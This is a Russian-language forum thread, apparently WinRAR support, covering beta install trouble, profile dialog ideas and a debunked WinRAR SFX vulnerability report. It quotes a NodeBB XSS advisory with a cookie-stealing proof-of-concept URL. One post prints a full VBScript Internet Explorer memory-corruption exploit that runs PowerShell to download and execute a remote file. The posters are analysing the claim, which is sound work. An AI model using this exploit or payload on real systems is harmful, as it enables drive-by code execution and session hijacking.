» WinRAR (часть 2)

Ikonnikoff
3-ю бету ставил без всяких проблем.

EugeneRoshal

Цитата:

Поддерживается, устанавливается. В первую очередь я бы подозревал антивирус, если он есть. Были случаи, когда антивирусы без причины блокировали и установщик, и сам winrar.exe.

Антивируса точно нет. Ноутбук старый, на нём крутится WinXP + SP2. Попробую завтра ещё раз разобраться со сложившейся ситуацией.

Victor_VG

Цитата:

Может просто файл битый? Должны подходить ибо VC++2008 собирает минимум для 2000-й (это его умолчание), а ХР/2003 старше.

Пробовал разные беты 5.30. Увы...

Ikonnikoff

Причины явно локальные. Просил друга проверить - у него ещё сохранилась XP SP3 - 5.30b4 встала без проблем.

Может быть проблема в том, что там WinXP SP2 ?

EugeneRoshal 21:04 26-09-2015
Цитата:

Загрузить профиль, отредактировать, сохранить под тем же именем.

Понятно, спасибо.
А можно ли где-нибудь в диалоге посмотреть, какой профиль в данный момент является текущим? Может, его как-нибудь крыжиком отметить в выпадающем списке?

Benchmark

Цитата:

Может быть проблема в том, что там WinXP SP2 ?

В PE32 Header стоит System 5.00 - Windows 2000. Сильно вряд ли. При случае спрошу у ребят Live! CD с XP SP2, гляну, но ....

Victor_VG

Цитата:

В PE32 Header стоит System 5.00 - Windows 2000

Если склероз не изменяет, WinRAR вообще не поддерживает Windows 2000 начиная с версии 5.0

Benchmark

Цитата:

Может быть проблема в том, что там WinXP SP2 ?

Я сейчас на XP без сервиспаков проверил - 5.30b4 устанавливается, работает.

Цитата:

Если склероз не изменяет, WinRAR вообще не поддерживает Windows 2000 начиная с версии 5.0

Это да. Но XP поддерживается.

oshizelly

Цитата:

А можно ли где-нибудь в диалоге посмотреть, какой профиль в данный момент является текущим?

Сейчас - нет.

Цитата:

Может, его как-нибудь крыжиком отметить в выпадающем списке?

Если пользователь что-то изменил в профиле - непонятно, можно ли по-прежнему отмечать его в выпадающем списке. Можно ведь доизменять до того, что он станет ближе к другому профилю. Сравнивать все настройки на всех страницах диалога с сохраненными в профиле - довольно муторно.

EugeneRoshal 21:09 27-09-2015
Цитата:

Если пользователь что-то изменил в профиле - непонятно, можно ли по-прежнему отмечать его в выпадающем списке...
Сравнивать все настройки на всех страницах диалога с сохраненными в профиле - довольно муторно.

Я подразумевал немного иной подход, гораздо более простой: можно отмечать в выпадающем списке профиль, который был выбран (применён) последним. Последующие изменения, внесённые пользователем on-the-fly прямо в настройках диалога, не отменяют этого факта.

oshizelly
Тут бы еще избежать путаницы с профилем по умолчанию. Боюсь, первая ассоциация у пользователей на галку в этом меню будет именно с профилем по умолчанию. В "Organize profiles" именно он ведь помечается.

EugeneRoshal 22:30 27-09-2015
Цитата:

Тут бы еще избежать путаницы с профилем по умолчанию. Боюсь, первая ассоциация у пользователей на галку в этом меню будет именно с профилем по умолчанию. В "Organize profiles" именно он ведь помечается.

Ну, можно по-другому как-нибудь выделить нужную строку, допустим, "засерить" её (сделать шрифт слегка светлее) или, наоборот, "заболдить". Много же есть способов.

oshizelly
Может все-таки галкой, но сначала, пока пользователь ничего не выбрал, помечать профиль по умолчанию. А если что-то выбрали, тогда галкой выбранный. Надо будет подумать в будущем.

EugeneRoshal

А если чуток иначе подойти и выводить над листбоксом имя выбранного профиля типа так:

Selected : <profile name>

тут уж точно не напутают.

Victor_VG
Как вариант, можно прямо над кнопкой Profiles все время, а не только при выводе списка. Правда на длинное имя профиля может не хватить места и придется обрезать с конца. Может и без "Selected:" тогда, чтобы место сэкономить.

EugeneRoshal

Согласен, если видно имя и понятно что это, то лишние буквы в строке <profile name> ни к чему. А если оно слишком длинное, то можно обрезать или вывести всплывающий баллон-подсказку с полной строкой.

В продолжение темы критических уязвимостей WinRAR:
http://habrahabr.ru/company/defconru/blog/267983/

p.s. В общем-то, не столько уязвимость, сколько еще одно напоминание, что не надо запускать что попало, скачанное откуда попало.

Benchmark

Тогда точнее указать первоисточник WinRAR SFX v5.21 - Remote Code Execution Vulnerability.

Benchmark
Это идиотизм, а не уязвимость. SFX и так может запустить что угодно через "Setup". Или скачать что угодно, через downloader в Setup, а потом запустить. Или можно заменить весь SFX модуль на вредоносный код. Не вижу тут ни единого дополнительного фактора риска.

Хотя шум в СМИ подняли знатный. Вплоть до "WinRAR security flaw opens users to remote attack just by unzipping files", непонятно откуда взявшихся.

Victor_VG
Первоисточник был тут:
http://www.vulnerability-lab.com/get_content.php?id=1608
но после того, как я написал автору и попросил его включить в статью ссылку на наш комментарий, он молча заменил этот первоисточник на какие-то посторонние данные.

EugeneRoshal

Понял, текст я сразу взял, но откуда в той статье взяли остальное и для меня загадка.

EugeneRoshal

Цитата:

Это идиотизм, а не уязвимость. SFX и так может запустить что угодно через "Setup". Или скачать что угодно, через downloader в Setup, а потом запустить. Или можно заменить весь SFX модуль на вредоносный код. Не вижу тут ни единого дополнительного фактора риска.

Собственно об этом я в постскриптуме и написал.

Удивило то, что акцент сделали на WinRAR, не упомянув любые другие архиваторы с продвинутыми SFX-модулями или установщики вроде NSIS.

Одно мне непонятно - какое отношение имеет Rar к ошибке в NodeBB??? Статью видать спьяну писали или под заказ...

Добавлено:
Benchmark

Там вообще речь идёт о совсем ином проекте:

Цитата:

NodeBB is a next-generation discussion platform that utilizes web sockets for instant interactions and real-time notifications. NodeBB forums have many modern features out of the box such as social network integration and streaming discussions. NodeBB is an open source project which can be forked on GitHub.

Очередной графоман отрисовался.
Вот [more=точная копия оригинала сообщения об уязвимости]
Document Title:
===============
NodeBB v0.8.2 - Client Side Cross Site Web Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1608


Release Date:
=============
2015-09-24


Vulnerability Laboratory ID (VL-ID):
====================================
1608


Common Vulnerability Scoring System:
====================================
3.4


Product & Service Introduction:
===============================
NodeBB is a next-generation discussion platform that utilizes web sockets for instant interactions and real-time
notifications. NodeBB forums have many modern features out of the box such as social network integration and streaming discussions.
NodeBB is an open source project which can be forked on GitHub.

(Copy of Vendor page https://docs.nodebb.org/en/latest/ & https://github.com/NodeBB/NodeBB/


Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a client-side vulnerability in the offical NodeBB v0.8.2 forum web-application.


Vulnerability Disclosure Timeline:
==================================
2015-09-24: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Github
Product: NodeBB - Web Application (CMS) 0.8.2


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A non-persistent input validation web vulnerability has been discovered in the offical NodeBB v0.8.2 forum web-application.
The security vulnerability allows remote attackers to manipulate client-side application to browser requests to compromise user session data.

The vulnerability is located in the `url` values of the `outgoing` module. Remote attackers are able to inject malicious script codes to client-side
browser to application requests. Remote attackers are able to prepare special crafted weblinks to execute client-side script code that compromises the
src/controllers/index.js GET data. The execution of the script code occurs in the src/controllers/index.js module. The attack vector of the vulnerability
is located on the client-side of the web-application and the request method to inject or execute the code is GET.

The security risk of the non-persistent cross site vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.4.
Exploitation of the non-persistent cross site scripting web vulnerability requires no privilege web application user account but low or medium user interaction.
Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing, non-persistent external redirects, non-persistent load
of malicious script codes or non-persistent web module context manipulation.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] outgoing

Vulnerable Parameter(s):
[+] url

Affected Module(s):
[+] src/controllers/index.js


Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote attackers without privilege web-application user account and with low or medium user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Ubuntu 14.04 (Firefox 39.0)
Vulnerable is GET parameter --url-- in outgoing controller (src/controllers/index.js)

PoC:
http://www.[website].com/outgoing?url=<script>alert("CSXSS")</script>
http://www.[website].com/outgoing?url=<script>alert(document.cookie)</script>


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the url value parameter in the outgoing module GET
method request.
Restrict the input and disallow special chars. Filter the input to prevent further client-side cross site scripting
attacks.


Security Risk:
==============
The security risk of the client-side cross site scripting vulnerability is estimated as medium. (CVSS 3.4)


Credits & Authors:
==================
Mikica Ivosevic


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com     - www.vuln-lab.com                     - www.evolution-sec.com
Contact: admin@vulnerability-lab.com     - research@vulnerability-lab.com              - admin@evolution-sec.com
Section: magazine.vulnerability-db.com    - vulnerability-lab.com/contact.php             - evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab         - facebook.com/VulnerabilityLab              - youtube.com/user/vulnerability0lab
Feeds:     vulnerability-lab.com/rss/rss.php    - vulnerability-lab.com/rss/rss_upcoming.php         - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php     - vulnerability-lab.com/list-of-bug-bounty-programs.php    - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

                Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™[/more] и про что-то иное кроме конкретной ошибки этого проекта в отчёте и речи нет.

Victor_VG
Сначала по этому адресу было про WinRAR, потом зачем-то заменили на NodeBB. Причем, мы его не просили убирать статью.

Добавлено:
Benchmark

Цитата:

Собственно об этом я в постскриптуме и написал.

Хотя, боюсь, внести какие-то изменения в SFX модуль придется из-за поднявшегося шума. Практического смысла никакого, но общественность требует Тут бы правда нормальным пользователям не напортить, излишне обрезав HTML возможности.

Если у кого этот proof of concept заработал, пришлите SFX архив на dev@rarlab.com
Я сейчас попробовал запустить Perl код с http://seclists.org/fulldisclosure/2015/Sep/106
Так там один из print битый, а если его поправить, он печатает пару строк и висит ждет чего-то. Надо разбираться.

EugeneRoshal

Ну, тогда это точно очередная балоболка коих не мало. Говорят что всё знают, а на деле с умным видом несут бред сивой кобылы при этом настаивая на своём праве лезть в чужой монастырь со своим уставом.

EugeneRoshal

Цитата:

Я сейчас попробовал запустить Perl код с http://seclists.org/fulldisclosure/2015/Sep/106
Так там один из print битый, а если его поправить, он печатает пару строк и висит ждет чего-то. Надо разбираться.

Что с Perl скриптом я понял. Он изображает из себя http сервер, и к нему надо обращаться из SFX модуля. Буду дальше смотреть.

EugeneRoshal

Цитата:

Что с Perl скриптом я понял. Он изображает из себя http сервер, и к нему надо обращаться из SFX модуля.

Красиво.

base:64

[more]
Код: <html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<head>
</head>
<body>

<SCRIPT LANGUAGE="VBScript">

function runmumaa()
On Error Resume Next
set shell=createobject("Shell.Application")
command="Invoke-Expression $(New-Object System.Net.WebClient).DownloadFile('http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe','load.exe');$(New-Object -com Shell.Application).ShellExecute('load.exe');"
shell.ShellExecute "powershell.exe", "-Command " & command, "", "runas", 0
end function
</script>

<SCRIPT LANGUAGE="VBScript">

dim aa()
dim ab()
dim a0
dim a1
dim a2
dim a3
dim win9x
dim intVersion
dim rnda
dim funclass
dim myarray

Begin()

function Begin()
On Error Resume Next
info=Navigator.UserAgent

if(instr(info,"Win64")>0) then
exit function
end if

if (instr(info,"MSIE")>0) then
intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
else
exit function

end if

win9x=0

BeginInit()
If Create()=True Then
myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)

if(intVersion<4) then
document.write("<br> IE")
document.write(intVersion)
runshellcode()
else
setnotsafemode()
end if
end if
end function

function BeginInit()
Randomize()
redim aa(5)
redim ab(5)
a0=13+17*rnd(6)
a3=7+3*rnd(5)
end function

function Create()
On Error Resume Next
dim i
Create=False
For i = 0 To 400
If Over()=True Then
Create=True
Exit For
End If
Next
end function

sub testaa()
end sub

function mydata()
On Error Resume Next
i=testaa
i=null
redim Preserve aa(a2)

ab(0)=0
aa(a1)=i
ab(0)=6.36598737437801E-314

aa(a1+2)=myarray
ab(2)=1.74088534731324E-310
mydata=aa(a1)
redim Preserve aa(a0)
end function


function setnotsafemode()
On Error Resume Next
i=mydata()
i=rum(i+8)
i=rum(i+16)
j=rum(i+&h134)
for k=0 to &h60 step 4
j=rum(i+&h120+k)
if(j=14) then
j=0
redim Preserve aa(a2)
aa(a1+2)(i+&h11c+k)=ab(4)
redim Preserve aa(a0)

j=0
j=rum(i+&h120+k)

Exit for
end if

next
ab(2)=1.69759663316747E-313
runmumaa()
end function

function Over()
On Error Resume Next
dim type1,type2,type3
Over=False
a0=a0+a3
a1=a0+2
a2=a0+&h8000000

redim Preserve aa(a0)
redim ab(a0)

redim Preserve aa(a2)

type1=1
ab(0)=1.123456789012345678901234567890
aa(a0)=10

If(IsObject(aa(a1-1)) = False) Then
if(intVersion<4) then
mem=cint(a0+1)*16
j=vartype(aa(a1-1))
if((j=mem+4) or (j*8=mem+8)) then
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
else
redim Preserve aa(a0)
exit function

end if
else
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
end if
end if


If(type1=&h2f66) Then
Over=True
End If
If(type1=&hB9AD) Then
Over=True
win9x=1
End If

redim Preserve aa(a0)

end function

function rum(add)
On Error Resume Next
redim Preserve aa(a2)

ab(0)=0
aa(a1)=add+4
ab(0)=1.69759663316747E-313
rum=lenb(aa(a1))

ab(0)=0
redim Preserve aa(a0)
end function

</script>

</body>
</html>

EugeneRoshal

Цитата:

Хотя, боюсь, внести какие-то изменения в SFX модуль придется из-за поднявшегося шума. Практического смысла никакого, но общественность требует

Увы, оно уже "широко пошло в народ":
http://www.theinquirer.net/inquirer/news/2428285/critical-winrar-flaw-puts-a-nation-of-unzippers-in-harms-way

Если честно, я не представляю, что разумного тут можно внести в SFX-модули. Разве что обрезать функционал до голой распаковки и комментарии - до голого текста. Но это же ерунда какая-то.

pavki
Спасибо. Я тоже уже этот код изучаю. Он у меня не работает, хотя с perl http сервера читается нормально. Я его для начала упростил до:

<script LANGUAGE="VBScript">

set shell=createobject("Shell.Application")
shell.ShellExecute "notepad.exe"

</script>

так ведь shell.ShellExecute отказывается что-нибудь запускать, если сначала пользователь не зайдет в MSIE Tools > Internet Options > Security > Custom level... и не разрешит "Initialize and script ActiveX controls not marked as safe for scripting". Без этого выдает ошибку доступа. С этой настройкой запускается, но MSIE ругается и просит вернуть все назад. И потом с ней ведь любой сайт сможет запускать exe у пользователя, не только SFX.

Вообще это начинает напоминать старый анекдот про текстовый вирус, который просит пользователя разослать 5 своих копий, а потом удалить свои файлы самостоятельно.

Benchmark

Цитата:

Увы, оно уже "широко пошло в народ":
Critical WinRAR flaw puts a nation of unzippers in harm's way

У меня есть желание написать что-нибудь нехорошее про журналистов на rarlab.com, но пока держусь

Цитата:

Если честно, я не представляю, что разумного тут можно внести в SFX-модули.

Я пока тоже. Ну можно запретить http-equiv="refresh", чтобы на другие сайты не перенаправляло, и вычищать все shell.ShellExecute из html, но только если для видимости бурной деятельности. А если вычистить все <script...>, нормальные пользователи точно не обрадуются. Скрипты ведь могут и для оформления использоваться. Причем пользы от всех этих движений - 0.

Цитата:

Разве что обрезать функционал до голой распаковки и комментарии - до голого текста.

Реально и это ничего не даст. Злоумышленник может заменить модуль на свой. Только чтоб журналистов утихомирить.

Цитата:

У меня есть желание написать что-нибудь нехорошее про журналистов на rarlab.com, но пока держусь

А засуньте туда ссылку
http://www.darknet.org.uk/2015/10/winrar-vulnerability-is-complete-bullshit/

pavki
Benchmark

Вы что издеваетесь над нашим стратегическим резервом? Да таких как автор сей затеи надо пачками во вражий стан закидывать и победа будет за нами.